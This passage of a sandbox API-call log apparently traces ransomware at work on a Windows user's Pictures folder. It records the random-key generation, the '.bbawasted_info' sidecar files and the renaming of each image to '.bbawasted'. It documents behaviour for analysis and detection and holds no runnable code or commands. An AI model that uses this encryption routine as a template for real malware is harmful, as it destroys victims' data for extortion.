halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\6rvx.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\6rvX.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\6rvx.bmp.bbawasted")) returned 1 [0075.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\6rvX.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\6rvx.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.003] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0075.005] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0075.006] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0075.006] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.006] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0075.007] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0075.007] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.015] SetEndOfFile (hFile=0x11c) returned 1 [0075.017] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.017] CloseHandle (hObject=0x11c) returned 1 [0075.022] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0075.022] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0075.070] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0075.070] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.070] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\7vlVcej5PfP0JrtmTZQq.jpg") returned 111 [0075.070] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2e8) returned 0x5d2990 [0075.070] lstrcpyW (in: lpString1=0x5d2a6e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.070] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.070] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0075.071] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.071] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\7vlVcej5PfP0JrtmTZQq.jpg.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\7vlvcej5pfp0jrtmtzqq.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.072] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0075.073] SetEndOfFile (hFile=0x11c) returned 1 [0075.073] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.073] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.073] lstrcpyW (in: lpString1=0x5d2a6e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\7vlVcej5PfP0JrtmTZQq.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\7vlvcej5pfp0jrtmtzqq.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\7vlVcej5PfP0JrtmTZQq.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\7vlvcej5pfp0jrtmtzqq.jpg.bbawasted")) returned 1 [0075.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\7vlVcej5PfP0JrtmTZQq.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\7vlvcej5pfp0jrtmtzqq.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0075.074] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0075.076] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0075.077] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0075.077] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.077] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0075.077] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0075.077] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.087] SetEndOfFile (hFile=0x11c) returned 1 [0075.089] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.089] CloseHandle (hObject=0x11c) returned 1 [0075.090] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0075.090] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0075.091] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0075.091] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.091] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\pPPBMj2Kr11PcDSush8.bmp") returned 99 [0075.091] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2d0) returned 0x5d2990 [0075.091] lstrcpyW (in: lpString1=0x5d2a56, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.091] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.091] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0075.092] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.092] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\pPPBMj2Kr11PcDSush8.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\pppbmj2kr11pcdsush8.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.093] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0075.094] SetEndOfFile (hFile=0x11c) returned 1 [0075.094] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.094] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.094] lstrcpyW (in: lpString1=0x5d2a56, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.094] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\pPPBMj2Kr11PcDSush8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\pppbmj2kr11pcdsush8.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\pPPBMj2Kr11PcDSush8.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\pppbmj2kr11pcdsush8.bmp.bbawasted")) returned 1 [0075.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\pPPBMj2Kr11PcDSush8.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\pppbmj2kr11pcdsush8.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.095] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0075.096] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0075.097] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0075.097] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.097] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0075.098] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0075.098] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.106] SetEndOfFile (hFile=0x11c) returned 1 [0075.108] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.108] CloseHandle (hObject=0x11c) returned 1 [0075.110] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0075.110] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0075.111] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0075.111] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.111] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\VgGvYBbXSci-MfEx.bmp") returned 96 [0075.111] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ca) returned 0x5d2990 [0075.111] lstrcpyW (in: lpString1=0x5d2a50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.111] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.111] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0075.112] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.112] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\VgGvYBbXSci-MfEx.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\vggvybbxsci-mfex.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.112] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0075.113] SetEndOfFile (hFile=0x11c) returned 1 [0075.113] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.113] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.114] lstrcpyW (in: lpString1=0x5d2a50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\VgGvYBbXSci-MfEx.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\vggvybbxsci-mfex.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\VgGvYBbXSci-MfEx.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\vggvybbxsci-mfex.bmp.bbawasted")) returned 1 [0075.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\VgGvYBbXSci-MfEx.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\vggvybbxsci-mfex.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0075.114] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0075.152] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5b8e48) returned 1 [0075.153] CryptGenRandom (in: hProv=0x5b8e48, dwLen=0x1b8, pbBuffer=0x5b8c88 | out: pbBuffer=0x5b8c88) returned 1 [0075.153] CryptReleaseContext (hProv=0x5b8e48, dwFlags=0x0) returned 1 [0075.153] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5b8e48) returned 1 [0075.153] CryptGenRandom (in: hProv=0x5b8e48, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0075.153] CryptReleaseContext (hProv=0x5b8e48, dwFlags=0x0) returned 1 [0075.162] SetEndOfFile (hFile=0x11c) returned 1 [0075.164] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0075.164] CloseHandle (hObject=0x11c) returned 1 [0075.166] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0075.166] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0075.167] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0075.167] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\I0b3.bmp") returned 64 [0075.167] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28a) returned 0x5d2990 [0075.167] lstrcpyW (in: lpString1=0x5d2a10, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.167] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0075.167] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0075.167] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0075.168] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\I0b3.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\i0b3.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.168] WriteFile (in: hFile=0x11c, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0075.169] SetEndOfFile (hFile=0x11c) returned 1 [0075.169] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.169] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0075.169] lstrcpyW (in: lpString1=0x5d2a10, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\I0b3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\i0b3.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\I0b3.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\i0b3.bmp.bbawasted")) returned 1 [0075.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\I0b3.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\i0b3.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.170] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0075.170] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0075.171] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0075.171] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.171] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0075.172] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0075.172] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.180] SetEndOfFile (hFile=0x11c) returned 1 [0075.182] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0075.182] CloseHandle (hObject=0x11c) returned 1 [0075.184] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0075.184] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0075.184] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0075.184] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\y50DSfidWrTvYW1A1LTW.png") returned 80 [0075.184] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2aa) returned 0x5d2990 [0075.185] lstrcpyW (in: lpString1=0x5d2a30, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.185] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0075.185] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0075.186] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0075.186] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\y50DSfidWrTvYW1A1LTW.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\y50dsfidwrtvyw1a1ltw.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.186] WriteFile (in: hFile=0x11c, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0075.187] SetEndOfFile (hFile=0x11c) returned 1 [0075.187] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.187] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0075.187] lstrcpyW (in: lpString1=0x5d2a30, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\y50DSfidWrTvYW1A1LTW.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\y50dsfidwrtvyw1a1ltw.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\y50DSfidWrTvYW1A1LTW.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\y50dsfidwrtvyw1a1ltw.png.bbawasted")) returned 1 [0075.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\y50DSfidWrTvYW1A1LTW.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\y50dsfidwrtvyw1a1ltw.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0075.188] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0075.192] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, 